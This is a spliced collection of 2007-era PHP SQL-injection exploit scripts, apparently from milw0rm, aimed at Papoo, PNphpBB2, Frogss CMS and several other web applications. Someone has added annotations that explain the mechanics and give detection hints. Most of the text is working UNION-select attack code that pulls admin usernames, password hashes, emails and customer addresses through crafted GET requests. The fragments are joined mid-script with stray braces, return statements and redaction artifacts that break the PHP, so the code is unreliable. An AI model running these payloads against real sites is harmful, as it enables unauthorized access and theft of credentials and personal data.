// Table-prefix disclosure. With no prefix supplied, a request whose menuid
// value breaks the statement is sent and the prefix is read back out of the
// MySQL error text the application echoes into its response. $p, $host,
// $path, $userid and $html are defined outside this span; wyslijpakiet() is
// too, and since the reply is read from the global $html below it presumably
// fills that variable — confirm against its definition.
// Defender note: this step only works because raw database error text reaches
// the HTTP response; the string "You have an error in your SQL syntax" in an
// outbound response is itself a useful alert condition.
if ($prefix == "") {
    $packet = "GET " . $p . "kontakt.php?menuid=-1)+ HTTP/1.0\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    wyslijpakiet($packet);
    if (strstr($html, "You have an error in your SQL syntax")) {
        // The error quotes the failing query. $temp[0] is everything before the
        // first "_papoo_collum3"; the prefix is whatever follows the last
        // "SELECT article FROM " within that part (hence count - 1).
        $temp = explode("_papoo_collum3", $html);
        $temp2 = explode("SELECT article FROM ", $temp[0]);
        $prefix = $temp2[count($temp2) - 1];
        echo "prefix: " . $prefix . "\n";
    } else {
        die("Unable to disclose table prefix...\n");
    }
}
print "Papoo <= 3.02 (kontakt menuid) Remote SQL Injection Exploit by Kacper\r\n";
// UNION-based injection through menuid. The delimiters "<!--[#" / "#]-->" and
// the ':' separator (CHAR(58)) are emitted as CHAR(...) lists, so the request
// line contains no quote characters — signature rules keyed on quotes will not
// match it; "union+select" and "CHAR(" in the query string will. The trailing
// "/*" comments out the rest of the original statement.
$packet = "GET " . $p . "kontakt.php?menuid=-1)+union+select+CONCAT(" . char_convert("<!--[#") . ",username,CHAR(58),password," . char_convert("#]-->") . ")+from+" . $prefix . "_papoo_user+WHERE+userid=" . $userid . "/* HTTP/1.0\r\n";
// Browser-like request headers; the Referer names the same script being hit.
$packet .= "Referer: http://" . $host . $path . "kontakt.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
// Fixed 3 s pause before reading $html; there is no check that the reply has
// actually arrived.
sleep(3);
// Split the reply on the opening marker. $temp[1] is undefined when the marker
// is absent (PHP notice, empty result). The $temp2 assignment here is dead —
// the loop that follows reassigns it on its first iteration.
$temp = explode('<!--[#', $html);
$temp2 = explode('#]-->', $temp[1]);
for ($i = 1; $i <= count($temp) - 1; $i++) {
    $temp2 = explode(":", $temp[$i]);
    if (sprawdz($temp2[1])) {
        echo "admin          => " . $temp2[0] . "\n";
        echo "password (md5) => " . $temp2[1] . "\n";
}
// PNphpBB2 section (a separate script from the Papoo one above: note it reads
// $user_id, not $userid). Two UNION injections through the "c" parameter pull
// user_password and then username for one user id. Spaces are replaced by
// "/**/" comments and the markers are CHAR(...)-encoded, so detection should
// match on the "/**/UNION/**/SELECT" sequence and the "CHAR(" lists rather
// than on whitespace or quotes; the static "Googlebot/2.1" User-Agent on a
// query-string request is a further anomaly worth logging.
print "Prefix -> " . $prefix . "\r\n";
print "+++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
$packet = "GET " . $p . "index.php?name=PNphpBB2&file=index&c=1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",user_password," . char_convert("]-Kacper>") . "),2,3,4/**/FROM/**/" . $prefix . "_phpbb_users/**/WHERE/**/user_id=" . $user_id . "/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "index.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
// First occurrence of the marker only; $t[1] is undefined when the reply does
// not contain it, which leaves $pass empty (see the check at the bottom).
$t = explode("<DEVIL_TEAM-[", $html);
$t2 = explode("]-Kacper>", $t[1]);
$pass = $t2[0];
// NOTE(review): the "******" below is a redaction artifact in this listing,
// not valid PHP — the surrounding lines concatenate the variable with " . ".
echo "Admin Password: "******"\r\n";
// Same injection, selecting username instead. The Referer says category.php
// although the request goes to index.php — copied from another script.
$packet = "GET " . $p . "index.php?name=PNphpBB2&file=index&c=1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",username," . char_convert("]-Kacper>") . "),2,3,4/**/FROM/**/" . $prefix . "_phpbb_users/**/WHERE/**/user_id=" . $user_id . "/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "category.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<DEVIL_TEAM-[", $html);
$t2 = explode("]-Kacper>", $t[1]);
$nick = $t2[0];
// NOTE(review): same redaction artifact as above.
echo "Admin Username: "******"\r\n";
// Failure is inferred only from an empty password; an empty username alone is
// not reported.
if ($pass == "") {
    echo "exploit failed, check prefix !!!!!!!!!! (index.php?name=PNphpBB2&file=index&c='1)\r\n";
    echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";
}
    }
    return $encoded;
}
// Article-print section. Unlike the other sections on this page, the
// injection point (article_id) is closed with a literal single quote, so the
// raw "'" in the query string is a direct signature for this request; the
// markers are still CHAR(...)-encoded. Here the table name is $prefix followed
// directly by "users" — the prefix is expected to carry its own separator.
// $p, $host, $path, $prefix, $user_id, $html and wyslijpakiet() come from
// outside this span.
print "++++++++++++++++++++++ START ++++++++++++++++++++\r\n";
$packet = "GET " . $p . "index.php?m=articles&ms=print&article_id=99999999'+union+select+0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",user_password," . char_convert("]-Kacper>") . "),2,3,4,5,6,7+from+" . $prefix . "users+where+user_id=" . $user_id . "/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "index.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
// Fixed pause before $html is read; no confirmation that the reply is complete.
sleep(3);
// $t[1] is undefined when the marker is missing; this section has no failure
// check at all, so an empty value is simply printed.
$t = explode("<DEVIL_TEAM-[", $html);
$t2 = explode("]-Kacper>", $t[1]);
$pass = $t2[0];
// Second request: same injection, user_name column.
$packet = "GET " . $p . "index.php?m=articles&ms=print&article_id=99999999'+union+select+0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",user_name," . char_convert("]-Kacper>") . "),2,3,4,5,6,7+from+" . $prefix . "users+where+user_id=" . $user_id . "/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "index.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<DEVIL_TEAM-[", $html);
$t2 = explode("]-Kacper>", $t[1]);
$nick = $t2[0];
echo "User Name: " . $nick . "\r\n";
// NOTE(review): "******" is a redaction artifact in this listing, not valid
// PHP — compare the concatenation on the line above.
echo "User Password: "******"\r\n";
print "++++++++++++++++++++++ DONE ++++++++++++++++++++\r\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";
echo "DEVIL TEAM HOME: http://devilteam.eu/\r\n";
    return $encoded;
}
// category.php section. Two "/**/"-obfuscated UNION injections through
// id_category read the pass and email columns of rows with level=3. The
// markers "<!--[" and "]-->" form an HTML comment, so the leaked value sits in
// the raw response body and is not visible on the rendered page — response
// inspection has to look at the source, not the rendered output. There is no
// LIMIT in the query, but only the first marker occurrence is read ($t[1]).
// $p, $host, $path, $prefix, $html and wyslijpakiet() come from outside this span.
print "+++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
$packet = "GET " . $p . "category.php?id_category=-1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<!--[") . ",pass," . char_convert("]-->") . "),2,3/**/FROM/**/" . $prefix . "Accounts/**/WHERE/**/level=3/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "category.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
// Fixed pause before $html is read.
sleep(3);
// $t[1] is undefined when the marker is absent (PHP notice, empty $pass); no
// failure check follows.
$t = explode("<!--[", $html);
$t2 = explode("]-->", $t[1]);
$pass = $t2[0];
// NOTE(review): "******" is a redaction artifact in this listing, not valid
// PHP — compare the email line at the end of this section.
echo "Admin Password: "******"\r\n";
// Same injection, email column.
$packet = "GET " . $p . "category.php?id_category=-1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<!--[") . ",email," . char_convert("]-->") . "),2,3/**/FROM/**/" . $prefix . "Accounts/**/WHERE/**/level=3/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "category.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<!--[", $html);
$t2 = explode("]-->", $t[1]);
$email = $t2[0];
echo "Admin E-Mail: " . $email . "\r\n";
?>

# milw0rm.com [2007-05-24]
    print "+++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
    print "Frogss CMS <= 0.7 SQL Injection Exploit by Kacper\r\n";
    print "Vulnerabilities Number: 3\r\n";
    $packet = "GET " . $p . "forum/viewtopic.php?t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(" . char_convert("<!--[") . ",haslo," . char_convert("]-->") . "),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/* HTTP/1.0\r\n";
    $packet .= "Referer: http://" . $host . $path . "forum/viewtopic.php\r\n";
    $packet .= "Accept-Language: pl\r\n";
    $packet .= "User-Agent: Googlebot/2.1\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    wyslijpakiet($packet);
    sleep(3);
    $t = explode("<!--[", $html);
    $t2 = explode("]-->", $t[1]);
    $pass = $t2[0];
    echo "Admin Password: "******"\r\n";
    $packet = "GET " . $p . "forum/viewtopic.php?t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(" . char_convert("<!--[") . ",login," . char_convert("]-->") . "),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/* HTTP/1.0\r\n";
    $packet .= "Referer: http://" . $host . $path . "forum/viewtopic.php\r\n";
    $packet .= "Accept-Language: pl\r\n";
    $packet .= "User-Agent: Googlebot/2.1\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    wyslijpakiet($packet);
    sleep(3);
    $t = explode("<!--[", $html);
    $t2 = explode("]-->", $t[1]);
    $login = $t2[0];
    echo "Admin Login: "******"\r\n";
}
?>

# milw0rm.com [2007-04-13]
}
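/**
 * Encode a byte string as a MySQL CHAR(...) expression, e.g. "ab" -> "CHAR(97,98)".
 *
 * Works byte-wise: each byte is emitted as its unsigned value, so multi-byte
 * UTF-8 input becomes a list of its individual bytes. An empty string yields
 * "CHAR()" — the original loop body never ran for that input and returned an
 * unbalanced "CHAR(".
 *
 * @param string $my_string Raw bytes to encode.
 * @return string The CHAR(...) expression.
 */
function char_convert(string $my_string): string
{
    // Guard the empty case explicitly so the parentheses are always balanced.
    if ($my_string === '') {
        return 'CHAR()';
    }
    // unpack('C*') yields one unsigned byte per element; implode() joins the
    // values with commas in one pass instead of appending per character.
    $bytes = unpack('C*', $my_string);
    return 'CHAR(' . implode(',', $bytes) . ')';
}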
print "++++++++++++++++++++++ START ++++++++++++++++++++\r\n";
$packet = "GET " . $p . "index.php?module=invoices&view=email&stage=1&submit=-1/*+DEVIL+TEAM+*/union/*+devilteam.eu+*/select/*+POLISH+TEAM+*/CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",name," . char_convert(":") . ",street_address," . char_convert(":") . ",street_address2," . char_convert(":") . ",city," . char_convert(":") . ",state," . char_convert(":") . ",country," . char_convert(":") . ",phone," . char_convert(":") . ",mobile_phone," . char_convert(":") . ",email," . char_convert("]-Kacper>") . "),1,2,3,4,5,6,7,8,9,10/**/FROM/*table=>*/si_customers/*+and+*/WHERE/*+user+ID+*/id=" . $user_id . "/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "index.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<DEVIL_TEAM-[", $html);
$t2 = explode("]-Kacper>", $t[1]);
$calosc = $t2[0];
$dane = explode(":", $calosc);
echo "Customer Name: " . $dane[0] . "\r\n";
echo "Customer Street: " . $dane[1] . "\r\n";
echo "Customer Street address 2: " . $dane[2] . "\r\n";
echo "Customer City: " . $dane[3] . "\r\n";